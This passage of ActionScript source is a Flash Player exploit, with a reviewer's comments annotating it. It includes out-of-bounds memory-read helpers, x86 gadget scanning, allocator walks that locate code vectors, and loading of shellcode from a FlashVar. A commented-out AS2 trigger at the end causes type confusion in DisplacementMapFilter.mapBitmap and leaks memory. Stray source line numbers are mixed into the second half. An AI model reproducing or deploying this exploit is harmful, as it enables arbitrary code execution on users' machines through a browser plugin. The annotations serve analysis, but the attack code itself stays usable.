			if(address >= vector_address)
			{
				vector[(address - vector_address) / 4] = value;
			}
			else
			{
				vector[0x40000000 - (vector_address - address) / 4] = value;
			}
		}

		// Locates two code addresses ("ninbets") in the Flash module by scanning backwards from a pointer read
		// at offset 0x1c of the tweaked vector's 4 KiB page, and returns them as [first, second].
		// The dword constants compared below are little-endian x86 byte sequences; by my reading (not stated by
		// the author, so treat as inferred):
		//   loop 1 looks for `6a 01 ff 70 f8 ff 70 fc` (push 1; push [eax-8]; push [eax-4]) at any of the four
		//   byte alignments, _loc7_ being the alignment, and sets _loc5_ to the address of the `6a`;
		//   if the preceding bytes are `8b 44 24 04` (mov eax,[esp+4]) it returns [_loc5_, 0];
		//   otherwise loop 2 continues backwards for `50 ff 50 08 83 c4 0c 5e 5d c3`
		//   (push eax; call [eax+8]; add esp,0xc; pop esi; pop ebp; ret) and returns [that address, _loc5_ - 6].
		// Both loops are unbounded: if a pattern is absent (other player build) they read until memory ends.
		function getNinbets(vector:*, vector_address:*) : Array {
			var _loc9_:uint = 0;
			var array_related_addr:uint = this.getMemoryAt(vector,vector_address,(vector_address & 0xfffff000) + 0x1c);
			var index_array_related_addr:uint = 0;
			var _loc5_:uint = 0;
			var _loc6_:uint = 0;
			// Convert the start address into an index into the tweaked vector (same scheme as getMemoryAt()).
			if(array_related_addr >= vector_address)
			{
				index_array_related_addr = (array_related_addr - vector_address) / 4;
			}
			else
			{
				index_array_related_addr = 0x40000000 - (vector_address - array_related_addr) / 4;
			}
			var _loc7_:uint = 0;
			// Loop 1: find `ff 70 f8` at alignment 2, 1, 0 (with `ff 70 fc` following) or 3.
			while(true)
			{
				index_array_related_addr--;
				_loc9_ = vector[index_array_related_addr];
				if(_loc9_ == 0xfff870ff)
				{
					_loc7_ = 2;
					break;
				}
				if(_loc9_ == 0xf870ff01)
				{
					_loc7_ = 1;
					break;
				}
				if(_loc9_ == 0x70ff016a)
				{
					_loc9_ = vector[index_array_related_addr + 1];
					if(_loc9_ == 0xfc70fff8)
					{
						_loc7_ = 0;
						break;
					}
				}
				else
				{
					if(_loc9_ == 0x70fff870)
					{
						_loc7_ = 3;
						break;
					}
				}
			}

			// Address of the `6a 01` that precedes the `ff 70 f8`.
			_loc5_ = vector_address + 4 * index_array_related_addr - _loc7_;
			index_array_related_addr--;
			var _loc8_:uint = vector[index_array_related_addr];
			// `8b 44 24 04` directly before it (any alignment): first form, second entry stays 0.
			if(_loc8_ == 0x16a0424)
			{
				return [_loc5_,_loc6_];
			}
			if(_loc8_ == 0x6a042444)
			{
				return [_loc5_,_loc6_];
			}
			if(_loc8_ == 0x424448b)
			{
				return [_loc5_,_loc6_];
			}
			if(_loc8_ == 0xff016a04)
			{
				return [_loc5_,_loc6_];
			}

			// Second form: remember 6 bytes before the `6a 01` and keep scanning backwards for
			// `50 ff 50 08 83 c4 0c 5e 5d c3`, masking off the bytes before the `50` at each alignment.
			_loc6_ = _loc5_ - 6;
			while(true)
			{
				index_array_related_addr--;
				_loc9_ = vector[index_array_related_addr];
				if(_loc9_ == 0x850ff50)
				{
					if(uint(vector[index_array_related_addr + 1]) == 0x5e0cc483)
					{
						_loc7_ = 0;
						break;
					}
				}
				_loc9_ = _loc9_ & 0xffffff00;
				if(_loc9_ == 0x50ff5000)
				{
					if(uint(vector[index_array_related_addr + 1]) == 0xcc48308)
					{
						_loc7_ = 1;
						break;
					}
				}
				_loc9_ = _loc9_ & 0xffff0000;
				if(_loc9_ == 0xff500000)
				{
					if(uint(vector[index_array_related_addr + 1]) == 0xc4830850)
					{
						if(uint(vector[index_array_related_addr + 2]) == 0xc35d5e0c)
						{
							_loc7_ = 2;
							break;
						}
					}
				}
				_loc9_ = _loc9_ & 0xff000000;
				if(_loc9_ == 0x50000000)
				{
					if(uint(vector[index_array_related_addr + 1]) == 0x830850ff)
					{
						if(uint(vector[index_array_related_addr + 2]) == 0x5d5e0cc4)
						{
							_loc7_ = 3;
							break;
						}
					}
				}
			}

			// Address of the `50` (push eax).
			_loc5_ = vector_address + 4 * index_array_related_addr + _loc7_;
			return [_loc5_,_loc6_];
		}

		// vector: tweaked vector with 0x40000001 length
		// address: address of tweaked vector
		// Returns the address of a FileReference-related object found through allocator bookkeeping.
		// Reading of the walk (inferred, not stated by the author): the dword at offset 28 of the tweaked
		// vector's page points into a table of 36-byte entries; the entry whose dword at +8 is 0x2a0
		// (presumably the size class FileReference objects live in) is found by stepping up or down; its dword
		// at +12 heads a list linked through +8, which is followed until the dword at +384 or +380 is
		// 0xffffffff. Neither loop is bounded.
		function getFileReferenceLocation(vector:*, address:*) : uint {
			var flash_address:uint = this.getMemoryAt(vector,address,(address & 0xfffff000) + 28);
			var _loc4_:uint = 0;
			while(true)
			{
				_loc4_ = this.getMemoryAt(vector,address,flash_address + 8);
				if(_loc4_ == 0x2a0)
				{
					break;
				}
				if(_loc4_ < 0x2a0)
				{
					flash_address = flash_address + 36;
				}
				else
				{
					flash_address = flash_address - 36;
				}
			}

			var file_ref_related_addr:uint = this.getMemoryAt(vector,address,flash_address + 12);
			while(this.getMemoryAt(vector,address, file_ref_related_addr + 384) != 0xffffffff)
			{
				if(this.getMemoryAt(vector,address, file_ref_related_addr + 380) == 0xffffffff)
				{
					break;
				}
				file_ref_related_addr = this.getMemoryAt(vector, address, file_ref_related_addr + 8);
			}
			return file_ref_related_addr;
		}

		// Returns the address of the payload inside one of the code vectors made by createCodeVectors().
		// Same bookkeeping walk as getFileReferenceLocation(): step through 0x24-byte entries (upwards only)
		// until one reports size 2032 (0x7f0, the code vectors' allocation size), then follow the list from its
		// +0xc until the object whose dword at +0x28 equals `mark` (slot [0] of a code vector, so the object
		// header is 0x28 bytes) and return +0x2c, i.e. slot [1]. Both loops are unbounded.
		function getCodeAddress(vector:*, vector_addr:*, mark:*) : uint {
			var vector_length_read:uint = 0;
			var vector_code_info_addr:uint = this.getMemoryAt(vector, vector_addr,(vector_addr & 0xfffff000) + 0x1c);
			while(true)
			{
				vector_length_read = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 8);
				if(vector_length_read == 2032) // code vector length
				{
					break;
				}
				vector_code_info_addr = vector_code_info_addr + 0x24;
			}

			var vector_code_contents_addr:uint = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 0xc);
			while(this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 0x28) != mark)
			{
				vector_code_contents_addr = this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 8);
			}
			return vector_code_contents_addr + 0x2c; // Code address, starting at nops after the mark
		}

		// Every vector in the array => 7f0 (header = 8; data => 0x7e8)
		// Allocates 8 Vector.<uint>s of 2032/4 - 8 = 500 elements (2000 data bytes), each with `mark` in [0] and
		// `nops` in [1]. The author's 0x7e8 data size does not match 500 dwords exactly; presumably the
		// allocator rounds these up to the 0x7f0 size class that getCodeAddress() searches for.
		function createCodeVectors(mark:uint, nops:uint) : * {
			var array:Array = new Array();
			var i:* = 0;
			while(i < 8)
			{
				array[i] = new Vector.<uint>(2032 / 4 - 8);
				array[i][0] = mark;
				array[i][1] = nops;
				i++;
			}
			return array;
		}

		// Copies the shellcode dwords from the "sh" FlashVar into every code vector, starting at slot [1]
		// (the NOP dword placed by createCodeVectors() is overwritten). param2 is unused.
		// Each entry is parsed with Number() and stored into a uint slot. for..in on an Array yields index
		// strings in ascending order for a dense array, which is what the split() result is.
		// Bounds: 499 entries fill slots [1..499]; a 500th appends to the non-fixed vector (possible
		// reallocation, invalidating the address getCodeAddress() already returned); more throw RangeError.
		function fillCodeVectors(param1:Array, param2:uint) : * {
			var i:uint = 0;
			var sh:uint=1;

			while(i < param1.length)
			{
				for(var u:String in shellcodeObj)
				{
					param1[i][sh++] = Number(shellcodeObj[u]);
				}
				i++;
				sh = 1;
			}
		}

	}
792}
793
// Trigger's ActionScript (AS2 source of the SWF embedded above as trigger_swf). It runs inside the Loader
// created by Exploit(); it swaps the global flash.display.BitmapData class for a String subclass before
// reading filt.mapBitmap, reads back the memory it disturbed through a GradientGlowFilter's colors/alphas,
// and sends that array to as2loaded() over LocalConnection "toAS3".
795
796/*
797
798// Action script...
799
800// [Action in Frame 1]
801var b = new flash.display.BitmapData(4, 7);
802var filt = new flash.filters.DisplacementMapFilter(b, new flash.geom.Point(1, 2), 1, 2, 3, 4);
803var b2 = new flash.display.BitmapData(256, 512);
804var filt2 = new flash.filters.DisplacementMapFilter(b2, new flash.geom.Point(1, 2), 1, 2, 3, 4);
805var colors = [16777215, 16711680, 16776960, 52479];
806var alphas = [0, 1, 1, 1];
807var ratios = [0, 63, 126, 255];
808var ggf = new flash.filters.GradientGlowFilter(0, 45, colors, alphas, ratios, 55, 55, 2.500000, 2, "outer", false);
809var cmf = new flash.filters.ColorMatrixFilter([]);
810MyString2.setCMF(cmf);
811MyString1.setGGF(ggf);
812flash.filters.ColorMatrixFilter.prototype.resetMe = _global.ASnative(2106, 302);
813zz = MyString1;
814flash.display.BitmapData = zz;
815arr = new Array();
816var i = 0;
817while (i < 8192)
818{
819	arr[i] = new Number(0);
820	++i;
821} // end while
822var i = 100;
823while (i < 8192)
824{
825	arr[i] = "qwerty";
826	i = i + 8;
827} // end while
828k = filt.mapBitmap;
829zz = MyString2;
830flash.display.BitmapData = zz;
831k = filt.mapBitmap;
832cmf_matrix = cmf.matrix;
833cmf_matrix[4] = 8192;
834cmf_matrix[15] = 12.080810;
835cmf.matrix = cmf_matrix;
836ggf_colors = ggf.colors;
837ggf_alphas = ggf.alphas;
838mem = new Array();
839var i = 0;
840while (i < ggf_alphas.length)
841{
842	ggf_alphas[i] = ggf_alphas[i] * 255;
843	++i;
844} // end while
845for (i = 0; i < ggf_colors.length; i++)
846{
847	mem[i] = ggf_colors[i] + ggf_alphas[i] * 16777216;
848} // end of for
849ggf.colors = colors;
850ggf.alphas = alphas;
851ggf.ratios = ratios;
852var lc = new LocalConnection();
853lc.send("toAS3", "as2loaded", mem); 
854zz = cmf;
855zz.resetMe("b", 1, 1, 1);
856
857
858class MyString1 extends String
859{
860	static var ggf;
	function MyString(a,b) // NOTE(review): named MyString, not MyString1, so AS2 treats it as an ordinary method and MyString1 keeps the default constructor (compare MyString2 below)
862	{
863		super();
864	}
865	
866	static function setGGF(myggf)
867	{
868		ggf = myggf;
869	}
870	
871	static function getGGF()
872	{
873		return (MyString1.ggf);
874	}
875}
876
877class MyString2 extends String
878{
879	static var cmf;
880	function MyString2(a,b)
881	{
882		super();
883	}
884	
885	static function setCMF(mycmf)
886	{
887		cmf = mycmf;
888	}
889	
890	static function getCMF()
891	{
892		return (MyString2.cmf);
893	}
894}
895
896
897*/